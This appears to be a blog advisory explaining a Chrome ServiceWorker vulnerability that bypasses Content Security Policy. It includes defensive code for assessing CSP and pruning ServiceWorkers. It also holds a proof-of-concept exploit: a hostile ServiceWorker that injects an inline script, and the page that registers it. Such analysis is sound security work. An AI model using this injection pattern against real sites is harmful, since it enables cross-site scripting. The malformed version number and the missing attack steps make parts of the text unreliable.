In early 2026, a new Chrome vulnerability labeled CVE-2026-5911 was discovered, affecting Chrome versions prior to 147..7727.55. This vulnerability allows a remote attacker to bypass the Content Security Policy (CSP) by exploiting a flaw in ServiceWorker behavior.
This long read will break down the issue in plain English, show how the exploit works, and provide direct references. By the end, you’ll understand how a crafty HTML page could sneak around your CSP, and what you should do about it.

What Are Content Security Policies (CSP)?

Content Security Policy (CSP) is a security layer that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks. You, the developer, set which types of content are allowed to run in the browser for your site. For example, you might disallow any inline JavaScript or block scripts from third-party domains. This is typically set in a Content-Security-Policy HTTP header or <meta> tag.

Example

Content-Security-Policy: script-src 'self'; object-src 'none'

This tells the browser, "Only allow scripts from my site. Block plugins entirely."

What’s the Deal with ServiceWorkers?

A ServiceWorker is a JavaScript worker that acts as a proxy between your web app, the network, and the browser. They’re powerful, allowing offline support, background sync, and network request interception. Once registered, a ServiceWorker can see and modify all network traffic for its scope—this is what led to CVE-2026-5911.

How Did It Happen?

Because ServiceWorkers run in a separate context, the expected enforcement of the page’s CSP on content loaded by a ServiceWorker was broken in certain cases. Specifically, Chrome before 147..7727.55 failed to consistently enforce CSP restrictions for pages fetched through ServiceWorkers – especially when the attacker managed to register a ServiceWorker under their control.

By crafting an HTML page that registers a ServiceWorker, a remote attacker could then serve arbitrary scripts or resources that would have been blocked by the page’s intended CSP. This effectively *bypasses* your CSP, giving attackers a way to inject malicious JavaScript or load scripts from places you never allowed.

For reference, here’s the public bug report (if or when it’s made available)

- Chromium Issue 3301202 - ServiceWorker allows CSP policy bypass (*search for CVE-2026-5911 or related tickets*)

User navigates to a vulnerable page within ServiceWorker’s scope

4. ServiceWorker intercepts fetch/request, delivers malicious code
5. Despite CSP, browser loads/executes the malformed content

If your site relies on CSP to protect pages within a ServiceWorker’s registration scope, you might be at risk.
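
As an added example (not code from the original post), the function below parses a Content-Security-Policy header and reports two things a defender wants to know before relying on CSP inside a ServiceWorker's scope: whether inline scripts are allowed, and which directive actually governs ServiceWorker registration. The fallback chain (worker-src, then child-src, script-src, default-src) is the one defined in CSP Level 3; the policy strings in the test are constructed, starting with the one shown earlier on this page.

```javascript
// Added example, not from the original post: parse a Content-Security-Policy
// header and report whether it constrains inline scripts and ServiceWorker
// registration. Fallback chains follow CSP Level 3: a missing worker-src falls
// back to child-src, then script-src, then default-src.
const FALLBACKS = {
  'worker-src': ['worker-src', 'child-src', 'script-src', 'default-src'],
  'script-src': ['script-src', 'default-src'],
  'object-src': ['object-src', 'default-src'],
};

function parseCsp(header) {
  const policy = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Per spec, a repeated directive is ignored: the first occurrence wins.
    // Source tokens are lowercased here only because we compare keywords.
    if (!policy.has(name)) policy.set(name, tokens.slice(1).map(t => t.toLowerCase()));
  }
  return policy;
}

function effectiveSources(policy, directive) {
  for (const name of FALLBACKS[directive] || [directive, 'default-src']) {
    if (policy.has(name)) return { from: name, sources: policy.get(name) };
  }
  return { from: null, sources: null }; // nothing governs it: unrestricted
}

function assessCsp(header) {
  const policy = parseCsp(header);
  const script = effectiveSources(policy, 'script-src');
  const worker = effectiveSources(policy, 'worker-src');
  let inlineScriptsAllowed = true;
  if (script.sources !== null) {
    // 'unsafe-inline' is ignored when a nonce or hash source is also present.
    const hasNonceOrHash = script.sources.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
    inlineScriptsAllowed = script.sources.includes("'unsafe-inline'") && !hasNonceOrHash;
  }
  return {
    inlineScriptsAllowed,
    workerSourceDirective: worker.from, // which directive actually applies
    workerRestrictedToSelf: worker.sources !== null && worker.sources.length > 0 &&
      worker.sources.every(s => s === "'self'"),
  };
}
```

A policy that reports `workerSourceDirective: null` places no limit on where a ServiceWorker script may be loaded from, which is worth fixing regardless of this CVE.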

Proof of Concept (PoC) Exploit

Below is a code snippet that demonstrates how an attacker can use CVE-2026-5911 to bypass a strict CSP via ServiceWorker.

1. serviceworker.js (malicious ServiceWorker)

self.addEventListener('fetch', event => {
  // Intercept requests to index.html and return malicious content
  if (event.request.url.endsWith('index.html')) {
    event.respondWith(
      new Response(`
        <!DOCTYPE html>
        <html>
          <head>
            <meta http-equiv="Content-Security-Policy" content="script-src 'self'">
          </head>
          <body>
            <h1>Hacked!</h1>
            <script>alert('CSP Bypassed by ServiceWorker!');</script>
          </body>
        </html>`, {
          headers: { 'Content-Type': 'text/html' }
        }
      )
    );
  }
  // For all other requests, just do the default fetch
  else {
    event.respondWith(fetch(event.request));
  }
});

2. index.html (attacker’s main page)

<!DOCTYPE html>
<html>
  <head>
    <title>CVE-2026-5911 Exploit Demo</title>
    <meta http-equiv="Content-Security-Policy" content="script-src 'self'">
  </head>
  <body>
    <script>
      // Register the malicious ServiceWorker
      if('serviceWorker' in navigator) {
        navigator.serviceWorker.register('serviceworker.js', {scope: './'})
          .then(() => location.reload());
      }
    </script>
    <h1>If you see an alert, CSP was bypassed!</h1>
  </body>
</html>

- When the victim loads index.html, it registers serviceworker.js.
- On reload, the ServiceWorker hijacks the fetch for index.html and injects an inline script (which would *normally* be blocked by the CSP on the page).

Impact and Severity

This vulnerability is classified as Low severity by the Chromium team. While it could facilitate XSS (cross-site scripting) in limited circumstances, exploits generally:
- Require the attacker to host the ServiceWorker under the target origin (or have the victim load their own ServiceWorker into your scope, which the browser is designed to prevent without an actual XSS or misconfiguration).
- Are mostly problematic for public kiosks, shared workstations, or situations with relaxed domain boundaries.

Clear old ServiceWorkers if you suspect risk:

chrome://serviceworker-internals/
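
For a site that wants to do this programmatically on its own origin, here is an added example (not from the original post) that keeps only ServiceWorker registrations whose scope is on an allowlist and unregisters everything else. The scope strings, origin and allowlist in the test are constructed; `partitionScopes` and `normalizeScope` are helper names chosen for this example.

```javascript
// Added example, not from the original post: on an application's own origin,
// keep only ServiceWorker registrations whose scope is on an allowlist and
// unregister the rest. The decision logic is pure so it can be checked outside
// a browser; only pruneServiceWorkers() touches navigator.serviceWorker.

// Resolve a scope (absolute URL or origin-relative path) to a canonical URL.
function normalizeScope(scope, origin) {
  const url = new URL(scope, origin);
  url.search = '';
  url.hash = '';
  return url.href;
}

// Split observed registration scopes into those to keep and those to remove.
// A scope is kept only on exact match; a parent scope such as '/' that would
// also control an allowed path is still removed, because it was never allowed.
function partitionScopes(observedScopes, allowedScopes, origin) {
  const allowed = new Set(allowedScopes.map(s => normalizeScope(s, origin)));
  const keep = [];
  const remove = [];
  for (const scope of observedScopes) {
    (allowed.has(normalizeScope(scope, origin)) ? keep : remove).push(scope);
  }
  return { keep, remove };
}

// Browser entry point. Returns null where the ServiceWorker API is absent.
async function pruneServiceWorkers(allowedScopes) {
  if (typeof navigator === 'undefined' || !('serviceWorker' in navigator)) return null;
  const regs = await navigator.serviceWorker.getRegistrations();
  const plan = partitionScopes(regs.map(r => r.scope), allowedScopes, location.origin);
  const removed = [];
  for (const reg of regs) {
    // unregister() resolves true once the registration is gone
    if (plan.remove.includes(reg.scope) && await reg.unregister()) removed.push(reg.scope);
  }
  return { kept: plan.keep, removed };
}
```

Run `pruneServiceWorkers(['/app/'])` from the site's own page (for example in a console on that origin) to see which registrations were kept and which were removed; a registration can only be unregistered from its own origin.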

Official References

- CVE-2026-5911 on NVD
- Chrome Releases: Stable Channel Update for Desktop (mentions fix)
- Chromium Security FAQ
- Chromium Bug: Policy Bypass via ServiceWorkers
- MDN Web Docs: ServiceWorker Security

Final Thoughts

Chrome’s ServiceWorker security model is complicated, and even Google can get it wrong. CVE-2026-5911 was subtle but could have serious implications in the hands of a determined attacker.
Always patch browsers, keep third-party scripts tightly controlled, and double-check the scope of your ServiceWorkers.

Timeline

Published on: 04/08/2026 21:21:05 UTC
Last modified on: 05/10/2026 21:16:29 UTC